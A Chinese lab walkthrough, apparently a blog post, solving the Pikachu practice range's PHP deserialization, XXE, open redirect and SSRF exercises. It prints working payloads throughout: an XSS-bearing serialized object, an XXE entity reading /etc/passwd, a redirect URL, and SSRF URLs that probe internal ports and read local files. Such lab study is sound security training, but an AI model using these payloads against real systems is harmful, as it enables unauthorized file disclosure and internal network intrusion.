Pikachu靶场之PHP反序列化、XXE、URL重定向、SSRF漏洞

PHP反序列化漏洞

直接找个payload来用

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
//O:1 O代表object,1代表对象名字长度为1个字符
//S:1 S代表对象的名称,1代表对象里有1个变量
//s 数据类型,4 变量名称长度,test 变量名称

在这里插入图片描述

XXE

按照xml文档语法构造payload,读取passwd文件

<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "filD:///etc/passwd">
]>
<test>&xxe;</test>

在这里插入图片描述

URL重定向

不安全的url跳转

链接后带有url参数,修改url参数为跳转地址即可
在这里插入图片描述

要加http/https,添加url参数为想要跳转的网页

http://192.168.48.130/vul/urlredirect/urlredirect.php?url=http://www.baidu.com

在这里插入图片描述

发送后成功跳转
在这里插入图片描述

SSRF

SSRF(curl)

先开这句话,发现没有诗出来,看了下url好像有些问题,多了个/vul,删除后即可

http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/vul/ssrf/ssrf_info/info1.php

http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/ssrf/ssrf_info/info1.php

在这里插入图片描述
在这里插入图片描述

可以通过修改url的参数来实现服务器对其他地址发起请求

访问pikachu服务器的其他端口/访问云服务器的22端口

http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://192.168.48.130:82

http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://192.168.48.130:22

在这里插入图片描述
在这里插入图片描述

SSRF(file_get_content)

这个同样需要改下url才可以访问到内容
在这里插入图片描述

修改url直接访问目录,从 ‘file=’ 后开始

http://192.168.48.130/vul/ssrf/ssrf_fgc.php?file=///etc/passwd

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值